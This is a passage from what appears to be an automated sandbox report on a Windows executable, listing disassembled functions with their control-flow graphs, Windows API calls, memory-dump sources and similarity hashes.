                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Thread$CloseCreateHandlePriorityResume
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3633986771-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 2473f1295a42763cfd341b8cfd7a40992b87c44e5d7ed509368ee88b1d319611
                                                                                                                                                                                                                                                                                  • Instruction ID: 6645a9ad8b039b71dcea5577e435f71539fac495394f4fe67fc8f101813e15ac
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2473f1295a42763cfd341b8cfd7a40992b87c44e5d7ed509368ee88b1d319611
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73E09BA5F0974242FB14AB21FC143B5A351FF99B95F8C4034CD5E56360EF3D91958B10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B0E30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 578 7ff72f5b0e30-7ff72f5b0e61 579 7ff72f5b0f1f-7ff72f5b0f3c GlobalMemoryStatusEx 578->579 580 7ff72f5b0e67-7ff72f5b0e82 GetCurrentProcess call 7ff72f60a95e 578->580 582 7ff72f5b0fc2-7ff72f5b0fc5 579->582 583 7ff72f5b0f42-7ff72f5b0f45 579->583 580->579 589 7ff72f5b0e88-7ff72f5b0e90 580->589 586 7ff72f5b0fc7-7ff72f5b0fcb 582->586 587 7ff72f5b0fce-7ff72f5b0fd1 582->587 584 7ff72f5b0fb1-7ff72f5b0fb4 583->584 585 7ff72f5b0f47-7ff72f5b0f52 583->585 592 7ff72f5b0fb6 584->592 593 7ff72f5b0fb9-7ff72f5b0fbc 584->593 590 7ff72f5b0f54-7ff72f5b0f59 585->590 591 7ff72f5b0f5b-7ff72f5b0f6c 585->591 586->587 594 7ff72f5b0fd3-7ff72f5b0fd8 587->594 595 7ff72f5b0fdb-7ff72f5b0fde 587->595 598 7ff72f5b0e92-7ff72f5b0e98 589->598 599 7ff72f5b0efa-7ff72f5b0eff 589->599 600 7ff72f5b0f70-7ff72f5b0f81 590->600 591->600 592->593 597 7ff72f5b0fe8-7ff72f5b100b call 7ff72f60acf0 593->597 601 7ff72f5b0fbe-7ff72f5b0fc0 593->601 594->595 596 7ff72f5b0fe0 595->596 595->597 602 7ff72f5b0fe5 596->602 603 7ff72f5b0ea1-7ff72f5b0eb5 598->603 604 7ff72f5b0e9a-7ff72f5b0e9f 598->604 608 7ff72f5b0f11-7ff72f5b0f14 599->608 609 7ff72f5b0f01-7ff72f5b0f04 599->609 606 7ff72f5b0f83-7ff72f5b0f88 600->606 607 7ff72f5b0f8a-7ff72f5b0f9e 600->607 601->602 602->597 610 7ff72f5b0eb9-7ff72f5b0eca 603->610 604->610 612 7ff72f5b0fa2-7ff72f5b0fae 606->612 607->612 608->597 615 7ff72f5b0f1a 608->615 613 7ff72f5b0f06-7ff72f5b0f09 609->613 614 7ff72f5b0f0b-7ff72f5b0f0e 609->614 616 7ff72f5b0ed3-7ff72f5b0ee7 610->616 617 7ff72f5b0ecc-7ff72f5b0ed1 610->617 612->584 613->608 614->608 615->602 618 7ff72f5b0eeb-7ff72f5b0ef7 616->618 617->618 618->599
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CurrentGlobalMemoryProcessStatus
                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                  • API String ID: 3261791682-2766056989
                                                                                                                                                                                                                                                                                  • Opcode ID: c50f9f1349a2f10861f7ecfcf3d9fa8d7e1c5a7709ec8babca00959837fe57fa
                                                                                                                                                                                                                                                                                  • Instruction ID: 4e11d36848e82700e4e047a1b2ec23ca8691be7bda7d0043adcf35a3c89e8de0
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c50f9f1349a2f10861f7ecfcf3d9fa8d7e1c5a7709ec8babca00959837fe57fa
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D541D361B1DB8641E9569A37D9113B9D252FF49FC0F58C231E90E66748FF3CE4818E20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B759B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Count64Tick
                                                                                                                                                                                                                                                                                  • String ID: @=}
                                                                                                                                                                                                                                                                                  • API String ID: 1927824332-3414626797
                                                                                                                                                                                                                                                                                  • Opcode ID: 65d7cefa01567033c58624f5b2484fdd1bfa5fa806f089eb6f936ec28982fb97
                                                                                                                                                                                                                                                                                  • Instruction ID: b46178816f63107caa3af23cc9641d9c9e3a8fc8a14a79106bb2b99a623221d5
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65d7cefa01567033c58624f5b2484fdd1bfa5fa806f089eb6f936ec28982fb97
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1412E25F0CAC686FA64BF26ED452F9A2A1EF08794FD54436D90D023E9DE3DE5418E20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5E2320 Relevance: 5.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF72F5CF9D9,?,?,?,?,?,00007FF72F5DE9FF,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5E2360
                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF72F5CF9D9,?,?,?,?,?,00007FF72F5DE9FF,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5E23D6
                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF72F5CF9D9,?,?,?,?,?,00007FF72F5DE9FF,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5E242B
                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF72F5CF9D9,?,?,?,?,?,00007FF72F5DE9FF,?,?,?,00007FF72F5B88C3), ref: 00007FF72F5E2451
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 2f26acfbe39efda905e31c116d58f05a84f1c8e613b3a673d8beab4140165067
                                                                                                                                                                                                                                                                                  • Instruction ID: 981dfbb4b5a4b397d42db498aee0b296bd10e62c50f624c8a35fb2395e94868d
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f26acfbe39efda905e31c116d58f05a84f1c8e613b3a673d8beab4140165067
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04317F25F0CAD282EA20BF16EC403F5A790FF68794FD80035D98C46699DE7CE5858B71
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B16E0 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF72F5B51C8,?,?,0000000A,00007FF72F5B4220,?,?,00000000,00007FF72F5ADBB1), ref: 00007FF72F5B1707
                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF72F5B51C8,?,?,0000000A,00007FF72F5B4220,?,?,00000000,00007FF72F5ADBB1), ref: 00007FF72F5B1727
                                                                                                                                                                                                                                                                                  • VirtualAllocExNuma.KERNEL32 ref: 00007FF72F5B1748
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual$CurrentNumaProcess
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 647533253-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 50d61e69d9914c3b35ffaae00cb017ff4e997f9ad39ea175855d1aa7930a3df2
                                                                                                                                                                                                                                                                                  • Instruction ID: aa692986196deed2883d7b1ec9d12afbffb0408f9d286037ead558a9f7a19327
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50d61e69d9914c3b35ffaae00cb017ff4e997f9ad39ea175855d1aa7930a3df2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86F0AF71B086D182EB209B06F800269A761FB49BD4F984138EF8C17B58CF3DD5918B10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C7A30 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 1324 7ff72f5c7a30-7ff72f5c7a64 call 7ff72f5e2480 1326 7ff72f5c7a69-7ff72f5c7a72 1324->1326 1327 7ff72f5c7a82-7ff72f5c7a84 1326->1327 1328 7ff72f5c7a74-7ff72f5c7a76 1326->1328 1329 7ff72f5c7a86-7ff72f5c7a8a 1327->1329 1331 7ff72f5c7a8c 1327->1331 1328->1329 1330 7ff72f5c7a78-7ff72f5c7a80 1328->1330 1333 7ff72f5c7a90-7ff72f5c7aa1 call 7ff72f60f5b0 1329->1333 1332 7ff72f5c7aa5-7ff72f5c7aab 1330->1332 1331->1333 1335 7ff72f5c7ab1-7ff72f5c7abb 1332->1335 1336 7ff72f5c7b6e-7ff72f5c7b83 1332->1336 1333->1332 1337 7ff72f5c7ac1-7ff72f5c7ac3 1335->1337 1338 7ff72f5c7b69 1335->1338 1339 7ff72f5c7b85-7ff72f5c7b8d 1336->1339 1340 7ff72f5c7bad-7ff72f5c7bd9 call 7ff72f5c7cf0 1336->1340 1337->1338 1343 7ff72f5c7ac9-7ff72f5c7acf 1337->1343 1338->1336 1344 7ff72f5c7b8f 1339->1344 1345 7ff72f5c7b9c-7ff72f5c7bab 1339->1345 1347 7ff72f5c7ad1-7ff72f5c7ae7 1343->1347 1348 7ff72f5c7aef-7ff72f5c7b24 1343->1348 1349 7ff72f5c7b90-7ff72f5c7b9a 1344->1349 1345->1339 1345->1340 1347->1348 1348->1338 1350 7ff72f5c7b26-7ff72f5c7b30 call 7ff72f5b1770 1348->1350 1349->1345 1349->1349 1350->1338 1353 7ff72f5c7b32-7ff72f5c7b3a 1350->1353 1353->1338 1354 7ff72f5c7b3c-7ff72f5c7b64 EnterCriticalSection LeaveCriticalSection 1353->1354 1354->1338
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5E2480: EnterCriticalSection.KERNEL32(?,?,?,00007FF72F5C7A69), ref: 00007FF72F5E24C4
                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF72F5E2480: LeaveCriticalSection.KERNEL32(?,?,?,00007FF72F5C7A69), ref: 00007FF72F5E24EE
                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 00007FF72F5C7B43
                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32 ref: 00007FF72F5C7B64
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: f2b6e7524cfd3a7049b78d530cb028a5667da698e63c4b036217a325343ed2f5
                                                                                                                                                                                                                                                                                  • Instruction ID: 26008570e563b15070e7ba2495a20548ce6f31c3edced9e117aa1bd68b46d52a
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2b6e7524cfd3a7049b78d530cb028a5667da698e63c4b036217a325343ed2f5
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B417E61B0868642FB14AF26AD402B5A3A0EF18BF8FD40335D97D47BD9DE28E441CB64
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B08D0 Relevance: 2.6, APIs: 2, Instructions: 82memoryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 54d16fb7520780bd85eec3c4bf88bb714ed96ad8374a8c3859c77b8b9086a31d
                                                                                                                                                                                                                                                                                  • Instruction ID: 7d63a2d10c53c9de89b1e5e453e38a16920df9a8445e5d50776a935d080259c1
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54d16fb7520780bd85eec3c4bf88bb714ed96ad8374a8c3859c77b8b9086a31d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B131B332B05B9281EA14EB16D9001AAA3A4FF49FD0F848535DF4C17B99EF38E5628750
                                                                                                                                                                                                                                                                                  Function 00007FF72F5E2480 Relevance: 2.5, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 2bbfaa70841822840f390fb10a6491ea87be68f299496f59d245e6c0d776f768
                                                                                                                                                                                                                                                                                  • Instruction ID: 313baa07f518afc0024f7ea7e33ebc96aa15c0824a82e5c912442990176942e9
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bbfaa70841822840f390fb10a6491ea87be68f299496f59d245e6c0d776f768
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26015E25F0CAD241F660BB16EC843F9E790EF647A0FD91035D95D42AA9CE3CE585CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B16A0 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                                  • Opcode ID: c142b665c17b9829f30997f3f45fa6cc62ef321f650404eeabfbf3fa27cb0e2d
                                                                                                                                                                                                                                                                                  • Instruction ID: 148b3a860c7d791264c69a59a8ab2b6b5ca5699919a6ef83982c11d86ca08bf9
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c142b665c17b9829f30997f3f45fa6cc62ef321f650404eeabfbf3fa27cb0e2d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88E0C234F1658197EB18AB13EC426A46252FF4EB00FC48038C80D47354DE2EA11A8F60
                                                                                                                                                                                                                                                                                  Function 00007FF72F642890 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(?,?,?,?,00000030,?,?,?,?,?,?,?,00007FF72F6427CF,?,?,00000030), ref: 00007FF72F6428E2
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
